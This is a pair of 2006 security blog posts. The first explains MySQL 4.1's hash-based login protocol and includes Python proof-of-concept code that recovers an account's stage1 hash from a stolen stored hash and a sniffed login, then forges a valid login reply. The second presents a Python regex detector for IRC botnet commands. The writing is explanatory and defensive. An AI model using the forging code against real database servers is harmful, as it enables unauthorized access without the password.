Thursday, March 30, 2006

MySQL 4.1.x authentication internals

While reviewing the deployment plans for a new MySQL server yesterday, I started wondering about the security of the authentication protocol it uses. Most of the users of the new database would be accessing it via the LAN, without the benefit of SSL encryption. It's well known that the MySQL 3.x authentication protocol is vulnerable to sniffing attacks, so MySQL 4.1 introduced a new authentication scheme designed to be more secure even over a plaintext session. But was it good enough?

I first spent some time working out exactly how the protocol works. Thanks to some kind folks in the #mysql channel on irc.freenode.net, I located the MySQL internals documentation page that describes the authentication protocol. Unfortunately, this page doesn't really describe what's going on in the 4.1 protocol, so I turned to the source code for the definitive scoop.

Just so no one else has to do this again, here's a better description of how the protocol works, based on the 5.0.19 release. Look in libmysql/password.c at the scramble() and check_scramble() functions if you want to check the source code for yourself.

The first thing to know is that the MySQL server stores password information in the "Password" field of the "mysql.user" table. This isn't actually the plaintext password; it's a SHA1 hash of a SHA1 hash of the password, like this: SHA1(SHA1(password)).

When a client tries to connect, the server will first generate a random string (the "seed" or "salt", depending on which document you're reading) and send it to the client. More on this later.

Now the client must ask for the user's password and use it to compute two hashes. The first hash is a simple hash of the user's password: SHA1(password). This is referred to in the code as the "stage1_hash". The client re-hashes stage1 to obtain the "stage2_hash": SHA1(stage1_hash). Note that the stage2 hash is the same as the hash the server stored in the database.

Next, the client hashes the seed concatenated with the stage2 hash, like so: SHA1(seed + stage2_hash). This temporary result is then XORed with the stage1 hash and transmitted to the server.

Now the server has all the information it needs to know whether the user supplied the correct password. Remember that the server stores the stage2_hash in the database, and it originally created the seed, so it knows both of those. What it wants to recover is the stage1_hash. Fortunately, the data transmitted from the client is just the hash of the seed and the stage2 hash, XORed with the stage1 hash. To recover the stage1 hash, the server recomputes SHA1(seed + stage2_hash), then XORs it with the data provided by the client. The result will be the stage1 hash. Since the stage2_hash is SHA1(stage1_hash), the server can compute a new stage2_hash from the recovered value and compare it to the hash in the database. If the two hashes match, the user provided the proper password.
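For anyone who finds code easier to follow than prose, here is a minimal Python sketch of the exchange described above. It is not the MySQL source: the function names (stored_hash, client_scramble, server_check) are made up for illustration, and the seed is just 20 random bytes, which is an assumption about its format. Only the hashing and XOR steps are taken from the description.

```python
import hashlib
import os


def sha1(data: bytes) -> bytes:
    """Raw 20-byte SHA1 digest."""
    return hashlib.sha1(data).digest()


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """Byte-wise XOR of two equal-length byte strings."""
    return bytes(x ^ y for x, y in zip(a, b))


def stored_hash(password: bytes) -> bytes:
    """What the server keeps: stage2_hash = SHA1(SHA1(password))."""
    return sha1(sha1(password))


def client_scramble(seed: bytes, password: bytes) -> bytes:
    """Client side: SHA1(seed + stage2_hash) XOR stage1_hash."""
    stage1_hash = sha1(password)
    stage2_hash = sha1(stage1_hash)
    return xor_bytes(sha1(seed + stage2_hash), stage1_hash)


def server_check(seed: bytes, reply: bytes, stage2_hash: bytes) -> bool:
    """Server side: recover stage1_hash, re-hash it, compare to the stored hash."""
    recovered_stage1 = xor_bytes(sha1(seed + stage2_hash), reply)
    return sha1(recovered_stage1) == stage2_hash


if __name__ == "__main__":
    seed = os.urandom(20)            # assumption: any random 20-byte seed
    db_hash = stored_hash(b"s3cret")
    print(server_check(seed, client_scramble(seed, b"s3cret"), db_hash))  # True
    print(server_check(seed, client_scramble(seed, b"wrong"), db_hash))   # False
```

Note that the password itself never crosses the wire, and the server never needs anything beyond the stage2 hash it already stores.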

Ok, I admit that was probably a little confusing, but here's where I think it gets really interesting. There is a flaw in this protocol. The security depends on keeping two pieces of information a secret from attackers: the stage1 and stage2 hashes. If the attacker knows both hashes, they can construct a login request that will be accepted by the server.

Stage2 hashes are protected by keeping the database files away from prying eyes, but if an attacker were to steal the database backup tapes, for example, the hashes for all database accounts would be in his possession.

Still, just having the stage2 hashes is not enough. The final piece of the client authentication credential is XORed with the stage1 hash, yet the server doesn't know the stage1 hash. The protocol therefore has to hand the server everything it needs to derive the stage1 hash. Unfortunately, that means the same information can be derived by anyone who can sniff a valid authentication transaction off the wire and who also possesses a copy of the stage2 hash.

So the weakness is that if an attacker has the stage2_hash stored in the db, and can observe a single successful authentication transaction, they can recover the stage1_hash for that account. Using both hashes, they can then create their own successful login request, even without knowing the user's actual password.
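To make the attack concrete, here is a rough Python sketch of it. Again, this is an illustration rather than anything taken from the MySQL code: recover_stage1 and forge_reply are hypothetical names, the seeds are arbitrary random bytes, and server_check just restates the server-side check described earlier so the example runs on its own.

```python
import hashlib
import os


def sha1(data: bytes) -> bytes:
    return hashlib.sha1(data).digest()


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def server_check(seed: bytes, reply: bytes, stage2_hash: bytes) -> bool:
    """The server-side check from the protocol description."""
    return sha1(xor_bytes(sha1(seed + stage2_hash), reply)) == stage2_hash


def recover_stage1(stage2_hash: bytes, sniffed_seed: bytes, sniffed_reply: bytes) -> bytes:
    """Attacker: same computation the server does, using the stolen stage2 hash."""
    return xor_bytes(sha1(sniffed_seed + stage2_hash), sniffed_reply)


def forge_reply(new_seed: bytes, stage1_hash: bytes) -> bytes:
    """Attacker: answer a fresh challenge without ever knowing the password."""
    stage2_hash = sha1(stage1_hash)
    return xor_bytes(sha1(new_seed + stage2_hash), stage1_hash)


if __name__ == "__main__":
    # The victim logs in once; the attacker sees only the seed and the reply.
    password = b"s3cret"
    stage2 = sha1(sha1(password))          # stolen, e.g. from a backup tape
    seed1 = os.urandom(20)
    reply1 = xor_bytes(sha1(seed1 + stage2), sha1(password))

    stage1 = recover_stage1(stage2, seed1, reply1)

    # Later, the server issues the attacker a brand new seed.
    seed2 = os.urandom(20)
    print(server_check(seed2, forge_reply(seed2, stage1), stage2))  # True
```

The attacker never learns the password. The recovered stage1 hash is all the client ever needed to answer a challenge.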

I've confirmed this with the MySQL team, who say that this is a known issue. It is difficult to exploit, I think, since you need a fair amount of information in order to make the attack successful. Frankly, if you already have the password hashes, you probably also already have the rest of the info in the database as well, so this might be overkill. Still, I had fun working through this last night, so I thought others might enjoy it as well. At the least, maybe I'll save someone else the time I spent understanding how the protocol works.

If this vulnerability really concerns you, you can protect the stage1 hash information by using MySQL's built-in SSL session encryption support. You should probably also be encrypting your backup tapes to protect the stage2 hash and all the data.

Friday, March 17, 2006

Detecting common botnets with Snort

I've been reading up on the mechanics of how popular bot software actually works, with an eye towards detecting it on the wire. I've been using the BLEEDING-EDGE ATTACK RESPONSE IRC - Nick change on non-std port rule and its cousins, which attempt to detect botnets and other "covert" channels that think they're clever by sending IRC protocol traffic over ports that are not normally associated with IRC. These work well, but have two problems:

  1. Some IM programs (like ICQ and MSN Messenger) use the IRC protocol on various ports and thus trigger this rule
  2. The rule doesn't detect botnet traffic if it happens to use the standard IRC port (6667)

One of the papers I've been reading recently was this great overview of four popular bot packages, An Inside Look at Botnets by Paul Barford and Vinod Yegneswaran. This isn't groundbreaking new research by any means, but they have started to put together some basic practical information about how these things work on the wire.

Having read that paper, I decided it would be fun to write a set of Snort rules to detect traffic generated by the four bots they mention. That would at least address part of problem #2, so it could be a worthwhile effort as well. Here are the rules, suitable for inclusion in your own local.rules file.

For those who are curious about what these do, the rules serve three functions. The first rule (sid 9000075) attempts to identify IRC protocol traffic, no matter what port the server is using. It sets the "is_proto_irc" flowbit on the session, so the later rules can depend on this being set and won't do a lot of work inspecting non-IRC packets. This rule will never generate any alerts; it's only there to make the other rules in this file more efficient.

The second rule (sid 9000076) isn't necessarily related directly to botnets. It looks for IRC servers that seem to be on your local network and are communicating with outside hosts. If you actually do run a legitimate server, modify or comment this out as appropriate.

All the rest of the rules look for specific commands used by AgoBot/PhatBot, SDBot, SpyBot and GTBot. The GTBot commands are slightly more complex. All the others just use plain words (like "portscan ") for commands, but GTBot uses a command character to distinguish commands from other data (like "!portscan "). Since it seemed to me that the command character was likely to change from botherder to botherder, I coded in a regular expression that tried to allow a variety of possible cmdchars. You'll see those in the rules.
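To illustrate the cmdchar idea outside of Snort, here is a small Python sketch. It is not the regular expression from my rules. It assumes the command arrives as the text of an IRC PRIVMSG, treats any single punctuation character as a possible cmdchar, and uses "portscan " as the only example command. The names GTBOT_CMD, PLAIN_CMD and classify are made up for this example.

```python
import re

# Assumption: a cmdchar is any one character that is neither alphanumeric,
# underscore, nor whitespace (for example "!", "@" or ".").
GTBOT_CMD = re.compile(rb"PRIVMSG\s+\S+\s+:[^\w\s]portscan ", re.IGNORECASE)

# The other bots use the bare word with no prefix character.
PLAIN_CMD = re.compile(rb"PRIVMSG\s+\S+\s+:portscan ", re.IGNORECASE)


def classify(line: bytes) -> str:
    """Return 'prefixed', 'plain' or 'none' for one raw IRC line."""
    if GTBOT_CMD.search(line):
        return "prefixed"
    if PLAIN_CMD.search(line):
        return "plain"
    return "none"


if __name__ == "__main__":
    print(classify(b"PRIVMSG #chan :!portscan 10.0.0.1 1 1024\r\n"))  # prefixed
    print(classify(b"PRIVMSG #chan :portscan 10.0.0.1 1 1024\r\n"))   # plain
    print(classify(b"PRIVMSG #chan :hello there\r\n"))                # none
```

Matching a whole class of characters rather than a literal "!" is what lets one pattern survive a botherder changing the cmdchar. The price is a somewhat higher chance of matching ordinary chatter.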

Anyway, feel free to use these rules if you like. I won't guarantee they work well yet, since I haven't been running them long, but so far so good. They probably won't crash your snort process, but that's about all I can say about them. I will give you one note of caution: If you find an active botnet, you may generate a lot of alerts. Consider using thresholding to avoid overwhelming your IDS analyst.

If you actually detect a botnet through these rules, please let me know. As far as I know, I have no active botnets right now, so I've only been able to test them against contrived traffic and not live data. I'd like to know if they do or do not work in the wild.

Update 4/4/2006: These bot rules are now included as part of the snort.org community ruleset. Thanks to Sourcefire's Alex Kirk, who made the rules better by pointing out that I forgot to add the "nocase" directive to make the rules case-insensitive. If you're using my rules, I recommend that you remove them and have a look at the community rules instead.